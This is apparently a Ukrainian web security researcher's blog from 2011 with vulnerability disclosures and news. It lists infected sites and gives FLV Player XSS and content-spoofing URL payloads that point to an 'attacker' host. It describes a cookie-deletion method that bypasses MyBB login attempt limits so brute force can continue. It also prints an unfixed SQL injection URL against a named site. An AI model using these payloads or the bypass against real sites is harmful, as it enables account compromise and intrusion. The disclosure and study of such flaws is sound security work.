Websecurity - Веб безпека

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://ridnamova.com.ua - інфекція була виявлена 21.08.2011. Зараз сайт входить до переліку підозрілих.
• http://vuzlib.net - інфекція була виявлена 18.08.2011. Зараз сайт не входить до переліку підозрілих. Як зазначає Гугл, при тому, що на сайті все ще є інфіковані сторінки.
• http://aqua-plant.com.ua - інфекція була виявлена 30.06.2011. Зараз сайт не входить до переліку підозрілих.
• http://aqua-fish.com.ua - інфекція була виявлена 30.06.2011. Зараз сайт не входить до переліку підозрілих.
• http://pslan.kiev.ua - інфекція була виявлена 30.07.2011. Зараз сайт не входить до переліку підозрілих.

Як і у випадку з іншими веб сайтами, інфіковані сайти ridnamova.com.ua і vuzlib.net також хостить в себе Укртелеком.

Виявленні численні уразливості безпеки в Mozilla Firefox, Seamonkey, Thunderbird.

Уразливі продукти: Mozilla Firefox 3.6, Firefox 5.0, SeaMonkey 2.2, Thunderbird 3.6, Thunderbird 6.0.

Численні пошкодження пам’яті, міжсайтовий доступ, витік інформації, обхід обмежень.

• Remote Binary Planting in Mozilla Firefox (деталі)
• Remote Binary Planting in Mozilla Thunderbird (деталі)
• Mozilla Firefox appendChild DOM Tree Inconsistency Remote Code Execution Vulnerability (деталі)
• Mozilla Firefox SVGTextElement.getCharNumAtPosition Remote Code Execution Vulnerability (деталі)
• Mozilla Foundation Security Advisory 2011-29 Security issues addressed in Firefox 6 (деталі)
• Mozilla Foundation Security Advisory 2011-30 Security issues addressed in Firefox 3.6.20 (деталі)
• Mozilla Foundation Security Advisory 2011-31 Security issues addressed in Thunderbird 6 (деталі)
• Mozilla Foundation Security Advisory 2011-32 Security issues addressed in Thunderbird 3.1.12 (деталі)
• Mozilla Foundation Security Advisory 2011-33 Security issues addressed in SeaMonkey 2.3 (деталі)

Після попереднього виявлення похаканих сайтів в моїх логах, приведу нову інформацію про взломані українських сайти. Що використовуються для атак (зокрема RFI атак) на інші сайти.

Похакані сайти в Уанеті:

• http://pasisa.at.ua (невідомим хакером) - 07.2011

Файли, що використовувалися для RFI атак:

http://pasisa.at.ua/indra/indo.jpg - файл вже видалений з сайта.
http://pasisa.at.ua/indra/star.jpg - файл вже видалений з сайта.

Більш того, хостер взагалі закрив цей сайт.

21.04.2011

У лютому, 24.02.2011, я знайшов Content Spoofing та Cross-Site Scripting уразливості в флеш відео плеері FLV Player. Які я виявив на одному сайті, що використовує даний веб додаток. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

20.08.2011

Content Spoofing:

Флешки плеєра FLV Player приймають довільні адреси в параметрі configxml, що дозволяє підробити вміст флешки - наприклад, вказавши адресу з файлом конфігурації з іншого сайта.

http://site/player_flv.swf?configxml=http://attacker/1.xml
http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml
http://site/player_flv_multi.swf?configxml=http://attacker/1.xml

Флешки плеєра FLV Player приймають довільні адреси в параметрі config, що дозволяє підробити вміст флешки - наприклад, вказавши адресу з файлом конфігурації з іншого сайта.

http://site/player_flv.swf?config=http://attacker/1.txt
http://site/player_flv_maxi.swf?config=http://attacker/1.txt
http://site/player_flv_multi.swf?config=http://attacker/1.txt

Флешки плеєра FLV Player дозволяють підробити всі важливі параметри, в тому числі flv і startimage, і при цьому приймають довільні адреси в параметрах flv і startimage, що дозволяє підробити вміст флешки - наприклад, вказавши адреси відео і зображення з іншого сайта. А для вказання лінки на довільний сайт можна використати параметри onclick і ondoubleclick.

http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_mini.swf?flv=http://attacker/1.flv

XSS:

http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml
http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml

Файл xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>

http://site/player_flv_maxi.swf?config=http://attacker/xss.txt
http://site/player_flv_multi.swf?config=http://attacker/xss.txt

Файл xss.txt:

onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)

Коде виконається після кліка (чи подвійного кліка). Це strictly social XSS.

Уразливі версії MINI, NORMAL, MAXI та MULTI плеєра. Зазначу, що версія NORMAL зустрічається під іменами player_flv.swf і player_flv_classic.swf. Автор FLV Player так і не виправив дані уразливості.

В різних формах на сайтах, зокрема в формі логіна, можуть використовуватися такі захисні методи як капча та тимчасове блокування. В формі логіна дані методи захищають від Brute Force атак. Але дані методи захисту можна обійти (при їх некоректній реалізації), як блокування, так і капчу, зокрема якщо капча наявна на сторінці не одразу, а з’являється після однієї чи кількох невдалих спроб логіна.

Це перша стаття з серії статей про методи обходу блокування на сайтах. Друга стаття - Обхід блокування по IP на сайтах.

Вперше я розробив подібну методику в 2009 році (та оприлюднив її торік), коли виявив уразливість на www.4post.com.ua, що дозволяла блокувати доступ користувача до сайта при спеціальному запиті. А при видаленні сесійного кукіса дане блокування можна було обійти. Про даний метод атаки я писав в статті Використання захисних механізмів для блокування доступу до сайта. Аналогічні можливості обходу блокування я неодноразово знаходив на різних сайтах в 2009-2011 роках.

А минулого місяця, під час аудиту сайта свого клієнта, я виявив можливість використання даного методу для обходу капчі в формі логіна (коли капча з’являється після однієї невдалої спроби логіна). Тобто статус того, що капча включена, знаходиться в сесії і якщо видалити сесійних кукіс, то капча не з’явиться і можна буде автоматизовано проводити Brute Force атаку. Тому якщо не приймати чи видаляти кукіси, можна буде обходити стан активації захисту і таким чином обходити капчі чи блокування на сайтах.

Такі уразливості в захисних системах трапляються на різних сайтах і веб додатках. Розглянемо подібну атаку на прикладі MyBB.

В квітні я оприлюднив Brute Force уразливість в MyBB, коли з’являлася капча в формі логіна, яку можна було обійти використовуючи session reusing with constant captcha bypass method (який описаний в проекті MoBiC). Розробники тоді не виправили дану та інші уразливості (в випущеній MyBB 1.6.3). Але як нещодавно вияснив, вони встановили в нових версіях MyBB 1.6.3 і 1.6.4 по замовчуванню інший метод захисту (який є також і в попередніх версіях движка і використовується на більшості форумів на MyBB). Цей захисний метод замість капчі використовує обмеження на кількість спроб, але даний захист легко обійти використовуючи вищенаведений метод.

Якщо не приймати кукіси (або видаляти чи обнуляти кукіс loginattempts), то кількість спроб буде нескінченною. І обмеження у вигляді капчі чи тимчасового блокування не спрацюють. А якщо воно вже спрацювало, то потрібно лише видалити чи обнулити даний кукіс, щоб його зняти.

Дана ситуація має місце на більшості форумів на MyBB, але зустрічаються форуми на таких версіях движка, що тримають лічильник спроб логіна не в кукісі loginattempts, а в сесії. Тому для обходу захисту потрібно лише видалити кукіс sid.

За повідомленням www.xakep.ru, уразливості в osCommerce дозволили взломати 5 млн. сторінок.

Атака, мішенню якої став популярний комерційний онлайн додаток, інфікувала майже 5 мільйонів сторінок скриптами, що робили спробу встановити шкідливу програму на комп’ютери відвідувачів.

Масова атака, у ході якої взламувалися сайти, що використовують непропатчені версії osCommerce - додатка для керування онлайн-магазином - тривала на прикінці липня. Атаку виявили дослідники з фірми безпеки Armorize, про веб антивірус якої я вже писав раніше.

За повідомленням hackzona.com.ua, у Німеччині відкрили центр кіберзахисту.

У Німеччині відбулася офіційна презентація нового відомства, відповідального за захист країни від хакерських атак. Як повідомляться, у четвер, 16 червня, про відкриття Національного центру кіберзахисту (Nationale Cyber-Abwehrzentrum, NCAZ) оголосив міністр внутрішніх справ країни.

За повідомленням www.xakep.ru, виявлена Ifrаme уразливість в Google App Engine.

Нещодавно індійський хакер Ethical Mohit виявив можливість вставки html-коду в сторінку Contact Desk у Google App Engine. Що дозволяла проводити Content Spoofing атаку. Ця уразливість стосується лише даного конкретного додатку, а не всієї платформи Google App Engine, але вона показує, що і в App Engine можуть бути уразливі додатки.

Зараз дана уразливість вже виправлена (чи розробниками Contact Desk, чи представниками Гугла). Але не повністю: якщо html включення вже не можливе, то все ще можливе включення тексту - Text Injection (про даний тип атак я вже розповідав торік).

Text Injection:

• включення тексту

В даній добірці уразливості в веб додатках:

• Weborf 0.12.4 Denial-of-Service (деталі)
• SQL Injection in Redaxscript (деталі)
• Vulnerability in cyrus-imapd (деталі)
• Path disclosure in Razor CMS (деталі)
• Plaintext injection in STARTTLS (multiple implementations) (деталі)
• Path disclosure in Pluck CMS (деталі)
• Hiawatha 7.4 - Denial-of-Service (деталі)
• Path disclosure in Pluck CMS (деталі)
• TP-LINK TL-WR740N Multiple Vulnerabilities - Stored XSS - Web Console and Upnp server DoS (деталі)
• Zikula CMS 1.2.4 <= Cross Site Request Forgery (CSRF) Vulnerability (деталі)

24.11.2010

У липні, 03.07.2010, я знайшов SQL Injection уразливість на сайті http://www.mayster.info. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

19.08.2011

SQL Injection:

http://www.mayster.info/index.php?content_id=-1%20or%20version()%3E5

Дана уразливість досі не виправлена.

Продовжуючи розпочату традицію, після попереднього відео про експлоіт для Microsoft Internet Explorer, пропоную нове відео на веб секюріті тематику. Цього разу відео про eксплоіт для Firefox. Рекомендую подивитися всім хто цікавиться цією темою.

Exploit for Firefox (CVE-2011-0073)

В даному відео ролику демонструється процес використання експлоіта для Mozilla Firefox, зокрема для уразливості MFSA 2011-13 Mozilla Firefox Nstreerangedangling Pointer Vulnerability. Дана уразливість в Firefox, що призводить до пошкодження пам’яті в браузері, була оприлюднена в травні.

Атака відбувається при відвідуванні в Firefox спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на браузери.

Виявлені уразливості безпеки в Apache Tomcat.

Уразливі версії: Tomcat 5.5, Tomcat 6.0, Tomcat 7.0.

Витік інформації, підвищення привілеїв.

• Commons Daemon fails to drop capabilities (Apache Tomcat) (деталі)